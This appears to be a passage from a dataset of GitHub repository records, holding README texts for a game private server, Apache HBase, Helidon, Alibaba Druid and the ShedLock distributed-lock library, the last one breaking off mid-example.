Otherwise, type `/account create [account name]` in the server console to create an account. -6. Login with your account name, the password field is ignored by the server and can be set to anything. - -### Server commands -Server commands can be run in the server console or in-game. There is a dummy user named ""Server"" in every player's friends list that you can message to use in-game commands. - -``` -/account {create | delete} [username] (reserved player uid). Creates or deletes an account. -/avatar lv(level) p(ascension) r(eidolon) s(skill levels). Sets the current avatar's properties. -/clear {relics | lightcones | materials | items}. Removes filtered items from the player inventory. -/gender {male | female}. Sets the player's gender. -/give [item id] x[amount] lv[number]. Gives the targetted player an item. -/giveall {materials | avatars | lightcones | relics}. Gives the targeted player items. -/heal. Heals your avatars. -/help. Displays a list of available commands. -/kick @[player id]. Kicks a player from the server. -/mail [content]. Sends the targeted player a system mail. -/permission {add | remove | clear} [permission]. Gives/removes a permission from the targeted player. -/refill. Refill your skill points in open world. -/reload. Reloads the server config. -/scene [scene id] [floor id]. Teleports the player to the specified scene. -/spawn [monster/prop id] x[amount] s[stage id]. Spawns a monster or prop near the targeted player. -/stop. Stops the server -/unstuck @[player id]. Unstucks an offline player if they're in a scene that doesn't load. -/worldlevel [world level]. Sets the targeted player's equilibrium level. -``` -",0 -apache/hbase,Apache HBase,2014-05-23T07:00:07Z,," - -![hbase-logo](https://raw.githubusercontent.com/apache/hbase/master/src/site/resources/images/hbase_logo_with_orca_large.png) - -[Apache HBase](https://hbase.apache.org) is an open-source, distributed, versioned, column-oriented store modeled after Google' [Bigtable](https://research.google.com/archive/bigtable.html): A Distributed Storage System for Structured Data by Chang et al. Just as Bigtable leverages the distributed data storage provided by the Google File System, HBase provides Bigtable-like capabilities on top of [Apache Hadoop](https://hadoop.apache.org/). - -# Getting Start -To get started using HBase, the full documentation for this release can be found under the doc/ directory that accompanies this README. Using a browser, open the docs/index.html to view the project home page (or browse https://hbase.apache.org). The hbase '[book](https://hbase.apache.org/book.html)' has a 'quick start' section and is where you should being your exploration of the hbase project. - -The latest HBase can be downloaded from the [download page](https://hbase.apache.org/downloads.html). - -We use mailing lists to send notice and discuss. The mailing lists and archives are listed [here](http://hbase.apache.org/mail-lists.html) - -# How to Contribute -The source code can be found at https://hbase.apache.org/source-repository.html - -The HBase issue tracker is at https://hbase.apache.org/issue-tracking.html - -Notice that, the public registration for https://issues.apache.org/ has been disabled due to spam. If you want to contribute to HBase, please visit the [Request a jira account](https://selfserve.apache.org/jira-account.html) page to submit your request. Please make sure to select **hbase** as the '_ASF project you want to file a ticket_' so we can receive your request and process it. - -> **_NOTE:_** we need to process the requests manually so it may take sometime, for example, up to a week, for us to respond to your request. - -# About -Apache HBase is made available under the [Apache License, version 2.0](https://hbase.apache.org/license.html) - -The HBase distribution includes cryptographic software. See the export control notice [here](https://hbase.apache.org/export_control.html). -",0 -sirthias/pegdown,A pure-Java Markdown processor based on a parboiled PEG parser supporting a number of extensions,2010-04-30T11:44:16Z,,,0 -helidon-io/helidon,Java libraries for writing microservices,2018-08-27T11:03:52Z,,"

- -

-

- - - - - - - - - -

- -# Helidon: Java Libraries for Microservices - -Project Helidon is a set of Java Libraries for writing microservices. -Helidon supports two programming models: - -* Helidon MP: [MicroProfile 6.0](https://github.com/eclipse/microprofile/releases/tag/6.0) -* Helidon SE: a small, functional style API - -In either case your application is a Java SE program running on the -new Helidon Níma WebServer that has been written from the ground up to -use Java 21 Virtual Threads. With Helidon 4 you get the high throughput of a reactive server with the simplicity of thread-per-request style programming. - -The Helidon SE API in Helidon 4 has changed significantly from Helidon 3. The use of virtual threads has enabled these APIs to change from asynchronous to blocking. This results in much simpler code that is easier to write, maintain, debug and understand. Earlier Helidon SE code will require modification to run on these new APIs. For more information see the [Helidon SE Upgrade Guide](https://helidon.io/docs/v4/#/se/guides/upgrade_4x). - -Helidon 4 supports MicroProfile 6. This means your existing Helidon MP 3.x applications will run on Helidon 4 with only minor modifications. And since Helidon’s MicroProfile server is based on the new Níma WebServer you get all the benefits of running on virtual threads. For more information see the [Helidon MP Upgrade Guide](https://helidon.io/docs/v4/#/mp/guides/upgrade_4x). - -New to Helidon? Then jump in and [get started](https://helidon.io/docs/v4/#/about/prerequisites). - -Java 21 is required to use Helidon 4. - - -## License - -Helidon is available under Apache License 2.0. - -## Documentation - -Latest documentation and javadocs are available at . - -Helidon White Paper is available [here](https://www.oracle.com/a/ocom/docs/technical-brief--helidon-report.pdf). - -## Get Started - -See Getting Started at . - -## Downloads / Accessing Binaries - -There are no Helidon downloads. Just use our Maven releases (GroupID `io.helidon`). -See Getting Started at . - -## Helidon CLI - -macOS: -```bash -curl -O https://helidon.io/cli/latest/darwin/helidon -chmod +x ./helidon -sudo mv ./helidon /usr/local/bin/ -``` - -Linux: -```bash -curl -O https://helidon.io/cli/latest/linux/helidon -chmod +x ./helidon -sudo mv ./helidon /usr/local/bin/ -``` - -Windows: -```bat -PowerShell -Command Invoke-WebRequest -Uri ""https://helidon.io/cli/latest/windows/helidon.exe"" -OutFile ""C:\Windows\system32\helidon.exe"" -``` - -See this [document](HELIDON-CLI.md) for more info. - -## Build - -You need JDK 21 to build Helidon 4. - -You also need Maven. We recommend 3.8.0 or newer. - -**Full build** -```bash -$ mvn install -``` - -**Checkstyle** -```bash -# cd to the component you want to check -$ mvn validate -Pcheckstyle -``` - -**Copyright** - -```bash -# cd to the component you want to check -$ mvn validate -Pcopyright -``` - -**Spotbugs** - -```bash -# cd to the component you want to check -$ mvn verify -Pspotbugs -``` - -**Documentatonn** - -```bash -# At the root of the project -$ mvn site -``` - -**Build Scripts** - -Build scripts are located in `etc/scripts`. These are primarily used by our pipeline, -but a couple are handy to use on your desktop to verify your changes. - -* `copyright.sh`: Run a full copyright check -* `checkstyle.sh`: Run a full style check - -## Get Help - -* See the [Helidon FAQ](https://github.com/oracle/helidon/wiki/FAQ) -* Ask questions on Stack Overflow using the [helidon tag](https://stackoverflow.com/tags/helidon) -* Join us on Slack: [#helidon-users](http://slack.helidon.io) - -## Get Involved - -* Learn how to [contribute](CONTRIBUTING.md) -* See [issues](https://github.com/oracle/helidon/issues) for issues you can help with - -## Stay Informed - -* Twitter: [@helidon_project](https://twitter.com/helidon_project) -* Blog: [Helidon on Medium](https://medium.com/helidon) -",0 -alibaba/druid,阿里云计算平台DataWorks(https://help.aliyun.com/document_detail/137663.html) 团队出品,为监控而生的数据库连接池,2011-11-03T05:12:51Z,,"# druid - -[![Java CI](https://img.shields.io/github/actions/workflow/status/alibaba/druid/ci.yaml?branch=master&logo=github&logoColor=white)](https://github.com/alibaba/druid/actions/workflows/ci.yaml) -[![Codecov](https://img.shields.io/codecov/c/github/alibaba/druid/master?logo=codecov&logoColor=white)](https://codecov.io/gh/alibaba/druid/branch/master) -[![Maven Central](https://img.shields.io/maven-central/v/com.alibaba/druid?logo=apache-maven&logoColor=white)](https://search.maven.org/artifact/com.alibaba/druid) -[![Last SNAPSHOT](https://img.shields.io/nexus/snapshots/https/oss.sonatype.org/com.alibaba/druid?label=latest%20snapshot)](https://oss.sonatype.org/content/repositories/snapshots/com/alibaba/druid/) -[![GitHub release](https://img.shields.io/github/release/alibaba/druid)](https://github.com/alibaba/druid/releases) -[![License](https://img.shields.io/github/license/alibaba/druid?color=4D7A97&logo=apache)](https://www.apache.org/licenses/LICENSE-2.0.html) - -Introduction ---- - -- git clone https://github.com/alibaba/druid.git -- cd druid && mvn install -- have fun. - -# 相关阿里云产品 -* [DataWorks数据集成](https://help.aliyun.com/document_detail/137663.html) ![DataWorks](https://github.com/alibaba/druid/raw/master/doc/dataworks_datax.png) - -Documentation ---- - -- 中文 https://github.com/alibaba/druid/wiki/%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98 -- English https://github.com/alibaba/druid/wiki/FAQ -- Druid Spring Boot Starter https://github.com/alibaba/druid/tree/master/druid-spring-boot-starter -",0 -lukas-krecan/ShedLock,Distributed lock for your scheduled tasks,2016-12-11T13:53:59Z,,"ShedLock -======== -[![Apache License 2](https://img.shields.io/badge/license-ASF2-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0.txt) [![Build Status](https://github.com/lukas-krecan/ShedLock/workflows/CI/badge.svg)](https://github.com/lukas-krecan/ShedLock/actions) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/net.javacrumbs.shedlock/shedlock-parent/badge.svg)](https://maven-badges.herokuapp.com/maven-central/net.javacrumbs.shedlock/shedlock-parent) - -ShedLock makes sure that your scheduled tasks are executed at most once at the same time. -If a task is being executed on one node, it acquires a lock which prevents execution of the same task from another node (or thread). -Please note, that **if one task is already being executed on one node, execution on other nodes does not wait, it is simply skipped**. - -ShedLock uses an external store like Mongo, JDBC database, Redis, Hazelcast, ZooKeeper or others for coordination. - -Feedback and pull-requests welcome! - -#### ShedLock is not a distributed scheduler -Please note that ShedLock is not and will never be full-fledged scheduler, it's just a lock. If you need a distributed -scheduler, please use another project ([db-scheduler](https://github.com/kagkarlsson/db-scheduler), [JobRunr](https://www.jobrunr.io/en/)). -ShedLock is designed to be used in situations where you have scheduled tasks that are not ready to be executed in parallel, but can be safely -executed repeatedly. Moreover, the locks are time-based and ShedLock assumes that clocks on the nodes are synchronized. - -+ [Versions](#versions) -+ [Components](#components) -+ [Usage](#usage) -+ [Lock Providers](#configure-lockprovider) - - [JdbcTemplate](#jdbctemplate) - - [R2DBC](#r2dbc) - - [jOOQ](#jooq-lock-provider) - - [Micronaut Data Jdbc](#micronaut-data-jdbc) - - [Mongo](#mongo) - - [DynamoDB](#dynamodb) - - [DynamoDB 2](#dynamodb-2) - - [ZooKeeper (using Curator)](#zookeeper-using-curator) - - [Redis (using Spring RedisConnectionFactory)](#redis-using-spring-redisconnectionfactory) - - [Redis (using Spring ReactiveRedisConnectionFactory)](#redis-using-spring-reactiveredisconnectionfactory) - - [Redis (using Jedis)](#redis-using-jedis) - - [Hazelcast](#hazelcast) - - [Couchbase](#couchbase) - - [ElasticSearch](#elasticsearch) - - [OpenSearch](#opensearch) - - [CosmosDB](#cosmosdb) - - [Cassandra](#cassandra) - - [Consul](#consul) - - [ArangoDB](#arangodb) - - [Neo4j](#neo4j) - - [Etcd](#etcd) - - [Apache Ignite](#apache-ignite) - - [In-Memory](#in-memory) - - [Memcached](#memcached-using-spymemcached) - - [Datastore](#datastore) -+ [Multi-tenancy](#multi-tenancy) -+ [Customization](#customization) -+ [Duration specification](#duration-specification) -+ [Extending the lock](#extending-the-lock) -+ [Micronaut integration](#micronaut-integration) -+ [CDI integration](#cdi-integration) -+ [Locking without a framework](#locking-without-a-framework) -+ [Troubleshooting](#troubleshooting) -+ [Modes of Spring integration](#modes-of-spring-integration) - - [Scheduled method proxy](#scheduled-method-proxy) - - [TaskScheduler proxy](#taskscheduler-proxy) -+ [Release notes](#release-notes) - -## Versions -If you are using JDK >17 and up-to-date libraries like Spring 6, use version **5.1.0** ([Release Notes](#500-2022-12-10)). If you -are on older JDK or library, use version **4.44.0** ([documentation](https://github.com/lukas-krecan/ShedLock/tree/version4)). - -## Components -Shedlock consists of three parts -* Core - The locking mechanism -* Integration - integration with your application, using Spring AOP, Micronaut AOP or manual code -* Lock provider - provides the lock using an external process like SQL database, Mongo, Redis and others - -## Usage -To use ShedLock, you do the following -1) Enable and configure Scheduled locking -2) Annotate your scheduled tasks -3) Configure a Lock Provider - - -### Enable and configure Scheduled locking (Spring) -First of all, we have to import the project - -```xml - - net.javacrumbs.shedlock - shedlock-spring - 5.13.0 - -``` - -Now we need to integrate the library with Spring. In order to enable schedule locking use `@EnableSchedulerLock` annotation - -```java -@Configuration -@EnableScheduling -@EnableSchedulerLock(defaultLockAtMostFor = ""10m"") -class MySpringConfiguration { - ... -} -``` - -### Annotate your scheduled tasks - -```java -import net.javacrumbs.shedlock.spring.annotation.SchedulerLock; - -... - -@Scheduled(...) -@SchedulerLock(name = ""scheduledTaskName"") -public void scheduledTask() { - // To assert that the lock is held (prevents misconfiguration errors) - LockAssert.assertLocked(); - // do something -} -``` - -The `@SchedulerLock` annotation has several purposes. First of all, only annotated methods are locked, the library ignores -all other scheduled tasks. You also have to specify the name for the lock. Only one task with the same name can be executed -at the same time. - -You can also set `lockAtMostFor` attribute which specifies how long the lock should be kept in case the -executing node dies. This is just a fallback, under normal circumstances the lock is released as soon the tasks finishes -(unless `lockAtLeastFor` is specified, see below) -**You have to set `lockAtMostFor` to a value which is much longer than normal execution time.** If the task takes longer than -`lockAtMostFor` the resulting behavior may be unpredictable (more than one process will effectively hold the lock). - -If you do not specify `lockAtMostFor` in `@SchedulerLock` default value from `@EnableSchedulerLock` will be used. - -Lastly, you can set `lockAtLeastFor` attribute which specifies minimum amount of time for which the lock should be kept. -Its main purpose is to prevent execution from multiple nodes in case of really short tasks and clock difference between the nodes. - -All the annotations support Spring Expression Language (SpEL). - -#### Example -Let's say you have a task which you execute every 15 minutes and which usually takes few minutes to run. -Moreover, you want to execute it at most once per 15 minutes. In that case, you can configure it like this: - -```java -import net.javacrumbs.shedlock.core.SchedulerLock; - - -@Scheduled(cron = ""0 */15 * * * *"") -@SchedulerLock(name = ""scheduledTaskName"", lockAtMostFor = ""14m"", lockAtLeastFor = ""14m"") -public void scheduledTask() { - // do something -} - -``` -By setting `lockAtMostFor` we make sure that the lock is released even if the node dies. By setting `lockAtLeastFor` -we make sure it's not executed more than once in fifteen minutes. -Please note that **`lockAtMostFor` is just a safety net in case that the node executing the task dies, so set it to -a time that is significantly larger than maximum estimated execution time.** If the task takes longer than `lockAtMostFor`, -it may be executed again and the results will be unpredictable (more processes will hold the lock). - -### Configure LockProvider -There are several implementations of LockProvider. - -#### JdbcTemplate -First, create lock table (**please note that `name` has to be primary key**) - -```sql -# MySQL, MariaDB -CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until TIMESTAMP(3) NOT NULL, - locked_at TIMESTAMP(3) NOT NULL DEFAULT CURRENT_TIMESTAMP(3), locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name)); - -# Postgres -CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until TIMESTAMP NOT NULL, - locked_at TIMESTAMP NOT NULL, locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name)); - -# Oracle -CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until TIMESTAMP(3) NOT NULL, - locked_at TIMESTAMP(3) NOT NULL, locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name)); - -# MS SQL -CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until datetime2 NOT NULL, - locked_at datetime2 NOT NULL, locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name)); - -# DB2 -CREATE TABLE shedlock(name VARCHAR(64) NOT NULL PRIMARY KEY, lock_until TIMESTAMP NOT NULL, - locked_at TIMESTAMP NOT NULL, locked_by VARCHAR(255) NOT NULL); -``` - -Or use [this](micronaut/test/micronaut-jdbc/src/main/resources/db/liquibase-changelog.xml) liquibase change-set. - -Add dependency - -```xml - - net.javacrumbs.shedlock - shedlock-provider-jdbc-template - 5.13.0 - -``` - -Configure: - -```java -import net.javacrumbs.shedlock.provider.jdbctemplate.JdbcTemplateLockProvider; - -... -@Bean -public LockProvider lockProvider(DataSource dataSource) { - return new JdbcTemplateLockProvider( - JdbcTemplateLockProvider.Configuration.builder() - .withJdbcTemplate(new JdbcTemplate(dataSource)) - .usingDbTime() // Works on Postgres, MySQL, MariaDb, MS SQL, Oracle, DB2, HSQL and H2 - .build() - ); -} -``` -By specifying `usingDbTime()` the lock provider will use UTC time based on the DB server clock. -If you do not specify this option, clock from the app server will be used (the clocks on app servers may not be -synchronized thus leading to various locking issues). - -It's strongly recommended to use `usingDbTime()` option as it uses DB engine specific SQL that prevents INSERT conflicts. -See more details [here](https://stackoverflow.com/a/76774461/277042). - -For more fine-grained configuration use other options of the `Configuration` object - -```java -new JdbcTemplateLockProvider(builder() - .withTableName(""shdlck"") - .withColumnNames(new ColumnNames(""n"", ""lck_untl"", ""lckd_at"", ""lckd_by"")) - .withJdbcTemplate(new JdbcTemplate(getDatasource())) - .withLockedByValue(""my-value"") - .withDbUpperCase(true) - .build()) -``` - -If you need to specify a schema, you can set it in the table name using the usual dot notation -`new JdbcTemplateLockProvider(datasource, ""my_schema.shedlock"")` - -To use a database with case-sensitive table and column names, the `.withDbUpperCase(true)` flag can be used. -Default is `false` (lowercase). - - -#### Warning -**Do not manually delete lock row from the DB table.** ShedLock has an in-memory cache of existing lock rows -so the row will NOT be automatically recreated until application restart. If you need to, you can edit the row/document, risking only -that multiple locks will be held. - -#### R2DBC -If you are really brave, you can try experimental R2DBC support. Please keep in mind that the -capabilities of this lock provider are really limited and that the whole ecosystem around R2DBC -is in flux and may easily break. - -```xml - - net.javacrumbs.shedlock - shedlock-provider-r2dbc - 5.13.0 - -``` - -and use it. - -```java -@Override -protected LockProvider getLockProvider() { - return new R2dbcLockProvider(connectionFactory); -} -``` -I recommend using [R2DBC connection pool](https://github.com/r2dbc/r2dbc-pool). - -#### jOOQ lock provider -First, create lock table as described in the [JdbcTemplate](#jdbctemplate) section above. - -Add dependency - -```xml - - net.javacrumbs.shedlock - shedlock-provider-jooq - 5.13.0 - -``` - -Configure: - -```java -import net.javacrumbs.shedlock.provider.jooq; - -... -@Bean -public LockProvider getLockProvider(DSLContext dslContext) { - return new JooqLockProvider(dslContext); -} -``` - -jOOQ provider has a bit different transactional behavior. While the other JDBC lock providers -create new transaction (with REQUIRES_NEW), jOOQ [does not support setting it](https://github.com/jOOQ/jOOQ/issues/4836). -ShedLock tries to create a new transaction, but depending on your set-up, ShedLock DB operations may -end-up being part of the enclosing transaction. - -If you need to configure the table name, schema or column names, you can use jOOQ render mapping as -described [here](https://github.com/lukas-krecan/ShedLock/issues/1830#issuecomment-2015820509). - -#### Micronaut Data Jdbc -If you are using Micronaut data and you do not want to add dependency on Spring JDBC, you can use -Micronaut JDBC support. Just be aware that it has just a basic functionality when compared to -the JdbcTemplate provider. - -First, create lock table as described in the [JdbcTemplate](#jdbctemplate) section above. - -Add dependency - -```xml - - net.javacrumbs.shedlock - shedlock-provider-jdbc-micronaut - 5.13.0 - -``` - -Configure: - -```java -import net.javacrumbs.shedlock.provider.jdbc.micronaut.MicronautJdbcLockProvider; - -... -@Singleton -public LockProvider lockProvider(TransactionOperations transactionManager) { - return new MicronautJdbcLockProvider(transactionManager); -} -``` - -#### Mongo -Import the project - -```xml - - net.javacrumbs.shedlock - shedlock-provider-mongo - 5.13.0 - -``` - -Configure: - -```java -import net.javacrumbs.shedlock.provider.mongo.MongoLockProvider; - -... - -@Bean -public LockProvider lockProvider(MongoClient mongo) { - return new MongoLockProvider(mongo.getDatabase(databaseName)) -} -``` - -Please note that MongoDB integration requires Mongo >= 2.4 and mongo-java-driver >= 3.7.0 - - -#### Reactive Mongo -Import the project - -```xml - - net.javacrumbs.shedlock - shedlock-provider-mongo-reactivestreams - 5.13.0 - -``` - -Configure: - -```java -import net.javacrumbs.shedlock.provider.mongo.reactivestreams.ReactiveStreamsMongoLockProvider; - -... - -@Bean -public LockProvider lockProvider(MongoClient mongo) { - return new ReactiveStreamsMongoLockProvider(mongo.getDatabase(databaseName)) -} -``` - -Please note that MongoDB integration requires Mongo >= 4.x and mongodb-driver-reactivestreams 1.x - - -#### DynamoDB 2 -Depends on AWS SDK v2. - -Import the project - -```xml - - net.javacrumbs.shedlock - shedlock-provider-dynamodb2 - 5.13.0 - -``` - -Configure: - -```java -import net.javacrumbs.shedlock.provider.dynamodb2.DynamoDBLockProvider; - -... - -@Bean -public LockProvider lockProvider(software.amazon.awssdk.services.dynamodb.DynamoDbClient dynamoDB) { - return new DynamoDBLockProvider(dynamoDB, ""Shedlock""); -} -``` - -> Please note that the lock table must be created externally with `_id` as a partition key. -> `DynamoDBUtils#createLockTable` may be used for creating it programmatically. -> A table definition is available from `DynamoDBLockProvider`'s Javadoc. - -#### ZooKeeper (using Curator) -Import -```xml - - net.javacrumbs.shedlock - shedlock-provider-zookeeper-curator - 5.13.0 - -``` - -and configure - -```java -import net.javacrumbs.shedlock.provider.zookeeper.curator.ZookeeperCuratorLockProvider; - -... - -@Bean -public LockProvider lockProvider(org.apache.curator.framework.CuratorFramework client) { - return new ZookeeperCuratorLockProvider(client); -} -``` -By default, nodes for locks will be created under `/shedlock` node. - -#### Redis (using Spring RedisConnectionFactory) -Import -```xml - - net.javacrumbs.shedlock - shedlock-provider-redis-spring - 5.13.0 - -``` - -and configure - -```java -import net.javacrumbs.shedlock.provider.redis.spring.RedisLockProvider; -import org.springframework.data.redis.connection.RedisConnectionFactory; - -... - -@Bean -public LockProvider lockProvider(RedisConnectionFactory connectionFactory) { - return new RedisLockProvider(connectionFactory, ENV); -} -``` - -#### Redis (using Spring ReactiveRedisConnectionFactory) -Import -```xml - - net.javacrumbs.shedlock - shedlock-provider-redis-spring - 5.13.0 - -``` - -and configure - -```java -import net.javacrumbs.shedlock.provider.redis.spring.ReactiveRedisLockProvider; -import org.springframework.data.redis.connection.ReactiveRedisConnectionFactory; - -... - -@Bean -public LockProvider lockProvider(ReactiveRedisConnectionFactory connectionFactory) { - return new ReactiveRedisLockProvider.Builder(connectionFactory) - .environment(ENV) - .build(); -} -``` - -Redis lock provider uses classical lock mechanism as described [here](https://redis.io/commands/setnx#design-pattern-locking-with-codesetnxcode) -which may not be reliable in case of Redis master failure. - -#### Redis (using Jedis) -Import -```xml - - net.javacrumbs.shedlock - shedlock-provider-redis-jedis4 - 5.13.0 - -``` - -and configure - -```java -import net.javacrumbs.shedlock.provider.redis.jedis.JedisLockProvider; - -... - -@Bean -public LockProvider lockProvider(JedisPool jedisPool) { - return new JedisLockProvider(jedisPool, ENV); -} -``` - -#### Hazelcast -Import the project - -```xml - - net.javacrumbs.shedlock - shedlock-provider-hazelcast4 - 5.13.0 - -``` - -Configure: - -```java -import net.javacrumbs.shedlock.provider.hazelcast4.HazelcastLockProvider; - -... - -@Bean -public HazelcastLockProvider lockProvider(HazelcastInstance hazelcastInstance) { - return new HazelcastLockProvider(hazelcastInstance); -} -``` - -#### Couchbase -Import the project - -```xml - - net.javacrumbs.shedlock - shedlock-provider-couchbase-javaclient3 - 5.13.0 - -``` - -Configure: - -```java -import net.javacrumbs.shedlock.provider.couchbase.javaclient.CouchbaseLockProvider; - -... - -@Bean -public CouchbaseLockProvider lockProvider(Bucket bucket) { - return new CouchbaseLockProvider(bucket); -} -``` - -For Couchbase 3 use `shedlock-provider-couchbase-javaclient3` module and `net.javacrumbs.shedlock.provider.couchbase3` package. - -#### Elasticsearch -I am really not sure it's a good idea to use Elasticsearch as a lock provider. But if you have no other choice, you can. Import the project - -```xml - - net.javacrumbs.shedlock - shedlock-provider-elasticsearch8 - 5.13.0 - -``` - -Configure: - -```java -import static net.javacrumbs.shedlock.provider.elasticsearch8.ElasticsearchLockProvider; - -... - -@Bean -public ElasticsearchLockProvider lockProvider(ElasticsearchClient client) { - return new ElasticsearchLockProvider(client); -} -``` - -#### OpenSearch -Import the project - -```xml - - net.javacrumbs.shedlock - shedlock-provider-opensearch - 4.36.1 - -``` - -Configure: - -```java -import static net.javacrumbs.shedlock.provider.opensearch.OpenSearchLockProvider; - -... - -@Bean -public OpenSearchLockProvider lockProvider(RestHighLevelClient highLevelClient) { - return new OpenSearchLockProvider(highLevelClient); -} -``` - -#### CosmosDB -CosmosDB support is provided by a third-party module available [here](https://github.com/jesty/shedlock-provider-cosmosdb) - - -#### Cassandra -Import the project - -```xml - - net.javacrumbs.shedlock - shedlock-provider-cassandra - 5.13.0 - -``` - -Configure: - -```java -import net.javacrumbs.shedlock.provider.cassandra.CassandraLockProvider; -import net.javacrumbs.shedlock.provider.cassandra.CassandraLockProvider.Configuration; - -... - -@Bean -public CassandraLockProvider lockProvider(CqlSession cqlSession) { - return new CassandraLockProvider(Configuration.builder().withCqlSession(cqlSession).withTableName(""lock"").build()); -} -``` - -Example for creating default keyspace and table in local Cassandra instance: -```sql -CREATE KEYSPACE shedlock with replication={'class':'SimpleStrategy', 'replication_factor':1} and durable_writes=true; -CREATE TABLE shedlock.lock (name text PRIMARY KEY, lockUntil timestamp, lockedAt timestamp, lockedBy text); -``` - -Please, note that CassandraLockProvider uses Cassandra driver v4, which is part of Spring Boot since 2.3. - -#### Consul -ConsulLockProvider has one limitation: lockAtMostFor setting will have a minimum value of 10 seconds. It is dictated by consul's session limitations. - -Import the project - -```xml - - net.javacrumbs.shedlock - shedlock-provider-consul - 5.13.0 - -``` - -Configure: - -```java -import net.javacrumbs.shedlock.provider.consul.ConsulLockProvider; - -... - -@Bean // for micronaut please define preDestroy property @Bean(preDestroy=""close"") -public ConsulLockProvider lockProvider(com.ecwid.consul.v1.ConsulClient consulClient) { - return new ConsulLockProvider(consulClient); -} -``` - -Please, note that Consul lock provider uses [ecwid consul-api client](https://github.com/Ecwid/consul-api), which is part of spring cloud consul integration (the `spring-cloud-starter-consul-discovery` package). - -#### ArangoDB -Import the project -```xml - - net.javacrumbs.shedlock - shedlock-provider-arangodb - 5.13.0 - -``` - -Configure: - -```java -import net.javacrumbs.shedlock.provider.arangodb.ArangoLockProvider; - -... - -@Bean -public ArangoLockProvider lockProvider(final ArangoOperations arangoTemplate) { - return new ArangoLockProvider(arangoTemplate.driver().db(DB_NAME)); -} -``` - -Please, note that ArangoDB lock provider uses ArangoDB driver v6.7, which is part of [arango-spring-data](https://github.com/arangodb/spring-data) in version 3.3.0. - -#### Neo4j -Import the project - -```xml - - net.javacrumbs.shedlock - shedlock-provider-neo4j - 5.13.0 - -``` - -Configure: -```java -import net.javacrumbs.shedlock.core.LockConfiguration; - -... - -@Bean -Neo4jLockProvider lockProvider(org.neo4j.driver.Driver driver) { - return new Neo4jLockProvider(driver); -} -``` - -Please make sure that ```neo4j-java-driver``` version used by ```shedlock-provider-neo4j``` matches the driver version used in your -project (if you use `spring-boot-starter-data-neo4j`, it is probably provided transitively). - -#### Etcd -Import the project -```xml - - net.javacrumbs.shedlock - shedlock-provider-etcd-jetcd - 5.13.0 - -``` - -Configure: - -```java -import net.javacrumbs.shedlock.provider.etcd.jetcd.EtcdLockProvider; - -... - -@Bean -public LockProvider lockProvider(Client client) { - return new EtcdLockProvider(client); -} -``` - - -#### Apache Ignite -Import the project -```xml - - net.javacrumbs.shedlock - shedlock-provider-ignite - 5.13.0 - -``` - -Configure: - -```java -import net.javacrumbs.shedlock.provider.ignite.IgniteLockProvider; - -... - -@Bean -public LockProvider lockProvider(Ignite ignite) { - return new IgniteLockProvider(ignite); -} -``` - -#### In-Memory -If you want to use a lock provider in tests there is an in-Memory implementation. - -Import the project -```xml - - net.javacrumbs.shedlock - shedlock-provider-inmemory - 5.13.0 - test - -``` - -```java -import net.javacrumbs.shedlock.provider.inmemory.InMemoryLockProvider; - -... - -@Bean -public LockProvider lockProvider() { - return new InMemoryLockProvider(); -} -``` - -#### Memcached (using spymemcached) -Please, be aware that memcached is not a database but a cache. It means that if the cache is full, -[the lock may be released prematurely](https://stackoverflow.com/questions/6868256/memcached-eviction-prior-to-key-expiry/10456364#10456364) -**Use only if you know what you are doing.** - -Import -```xml - - net.javacrumbs.shedlock - shedlock-provider-memcached-spy - 5.13.0 - -``` - -and configure - -```java -import net.javacrumbs.shedlock.provider.memcached.spy.MemcachedLockProvider; - -... - -@Bean -public LockProvider lockProvider(net.spy.memcached.MemcachedClient client) { - return new MemcachedLockProvider(client, ENV); -} -``` - -P.S.: - -Memcached Standard Protocol: -- A key (arbitrary string up to 250 bytes in length. No space or newlines for ASCII mode) -- An expiration time, in `seconds`. '0' means never expire. Can be up to 30 days. After 30 days, is treated as a unix timestamp of an exact date. (support `seconds`、`minutes`、`days`, and less than `30` days) - - -#### Datastore - -Import the project -```xml - - net.javacrumbs.shedlock - shedlock-provider-datastore - 5.13.0 - -``` - -and configure -```java -import net.javacrumbs.shedlock.provider.datastore.DatastoreLockProvider; - -... - -@Bean -public LockProvider lockProvider(com.google.cloud.datastore.Datastore datastore) { - return new DatastoreLockProvider(datastore); -} - -``` -#### Spanner -Import the project -```xml - - net.javacrumbs.shedlock - shedlock-provider-spanner - 5.13.0 - -``` -Configure -```java -import net.javacrumbs.shedlock.provider.spanner.SpannerLockProvider; - -... - -// Basic -@Bean -public LockProvider lockProvider(DatabaseClient databaseClient) { - return new SpannerLockProvider(databaseClientSupplier); -} - -// Custom host, table and column names -@Bean -public LockProvider lockProvider(DatabaseClient databaseClient) { - var config = SpannerLockProvider.Configuration.builder() - .withDatabaseClient(databaseClientSupplier) - .withTableConfiguration(SpannerLockProvider.TableConfiguration.builder() - ... - // Custom table and column names - .build()) - .withHostName(""customHostName"") - .build(); - - return new SpannerLockProvider(config); -} -``` - - -## Multi-tenancy -If you have multi-tenancy use-case you can use a lock provider similar to this one -(see the full [example](https://github.com/lukas-krecan/ShedLock/blob/master/providers/jdbc/shedlock-provider-jdbc-template/src/test/java/net/javacrumbs/shedlock/provider/jdbctemplate/MultiTenancyLockProviderIntegrationTest.java#L87)) -```java -private static abstract class MultiTenancyLockProvider implements LockProvider { - private final ConcurrentHashMap providers = new ConcurrentHashMap<>(); - - @Override - public @NonNull Optional lock(@NonNull LockConfiguration lockConfiguration) { - String tenantName = getTenantName(lockConfiguration); - return providers.computeIfAbsent(tenantName, this::createLockProvider).lock(lockConfiguration); - } - - protected abstract LockProvider createLockProvider(String tenantName) ; - - protected abstract String getTenantName(LockConfiguration lockConfiguration); -} -``` - -## Customization -You can customize the behavior of the library by implementing `LockProvider` interface. Let's say you want to implement -a special behavior after a lock is obtained. You can do it like this: - -```java -public class MyLockProvider implements LockProvider { - private final LockProvider delegate; - - public MyLockProvider(LockProvider delegate) { - this.delegate = delegate; - } - - @Override - public Optional lock(LockConfiguration lockConfiguration) { - Optional lock = delegate.lock(lockConfiguration); - if (lock.isPresent()) { - // 